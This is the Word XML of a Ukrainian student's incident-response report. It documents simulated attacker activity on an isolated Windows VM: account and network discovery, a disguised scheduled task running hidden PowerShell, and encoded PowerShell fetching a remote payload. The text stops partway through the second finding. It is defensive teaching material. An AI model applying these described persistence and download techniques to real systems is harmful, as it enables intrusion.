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left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BLUE TEAM / DFIR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Звіт про розслідування інциденту кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Виявлення слідів несанкціонованої активності на хості WIN-EL1M42JDN20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Підготував</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Артем Болюта</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Роль</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC-аналітик (навчальний проєкт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Курс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Кібербезпека — підсумковий проєкт</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Дата</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Червень 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Класифікація</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Навчальний / контрольоване середовище</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Стислий опис (Executive Summary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">У межах навчального проєкту з кібербезпеки на ізольованій віртуальній машині Windows 11 Pro було змодельовано чотири типові техніки зловмисника відповідно до матриці MITRE ATT&amp;CK. Мета — продемонструвати повний цикл роботи SOC-аналітика: від налаштування журналювання до виявлення, документування та формування рекомендацій.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Усі дії були навмисно відтворені самим аналітиком у контрольованому середовищі без використання реального шкідливого коду. Розслідування проводилось виключно на основі вбудованого журналу подій Windows (Security Event Log), без сторонніх агентів моніторингу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Виявлено 4 індикатори підозрілої активності: розвідку облікових записів, закріплення в системі через заплановане завдання, мережеву розвідку та обфускований PowerShell-скрипт зі спробою завантаження зовнішнього payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Середовище та обсяг розслідування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Назва хоста</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WIN-EL1M42JDN20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Операційна система</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11 Pro, Build 26100.4349 (24H2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Користувач</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Bolyuta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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IP-адреса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Платформа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Віртуальна машина (UTM / QEMU, ARM64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Аналітик</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Артем Болюта</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Дата розслідування</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Червень 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Методологія</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Розслідування проводилось за стандартним циклом реагування на інциденти (Detect → Investigate → Document → Recommend) з використанням наступних інструментів:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows Event Viewer — перегляд журналу Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">auditpol — налаштування політик аудиту</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Event ID 4688 (Process Creation) як основне джерело доказів</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перед розслідуванням було активовано розширене журналювання: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2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Категорія аудиту</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Статус</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Process Creation (Event ID 4688)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Увімкнено (Success/Failure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Увімкнено (Success/Failure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Увімкнено (Success/Failure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Увімкнено (Success/Failure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Command line у Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Увімкнено (ProcessCreationIncludeCmdLine_Enabled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Хронологія подій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60"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Етап</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5060"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Подія</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:left w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:bottom w:val="single" w:color="D9D9D9" w:sz="2"/>
              <w:right w:val="single" w:color="D9D9D9" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Розвідка облікових записів: net user / net localgroup administrators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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b/>
                <w:bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1087</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Створення запланованого завдання “WindowsUpdateCheck” з прихованим PowerShell від SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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b/>
                <w:bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Мережева розвідка: ipconfig /all, arp -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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b/>
                <w:bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Закодований (Base64) PowerShell, спроба завантаження payload із зовнішнього URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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b/>
                <w:bCs/>
                <w:color w:val="0F766E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1027 / T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Детальні знахідки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Знахідка 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Розвідка облікових записів</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1087 — Account Discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Рівень загрози: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Середній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Створений процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">net1.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Батьківський процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">net.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Командний рядок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\WINDOWS\system32\net1 user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Користувач</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WIN-EL1M42JDN20\Bolyuta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Чому це підозріло:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net.exe є лише обгорткою — реальне виконання делегується до net1.exe, що часто пропускають недосвідчені аналітики.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Перелік локальних користувачів і груп адміністраторів — стандартний перший крок зловмисника після отримання доступу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Знахідка 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Закріплення через заплановане завдання</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1053.005 — Scheduled Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      Рівень загрози: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Високий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Створений процес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
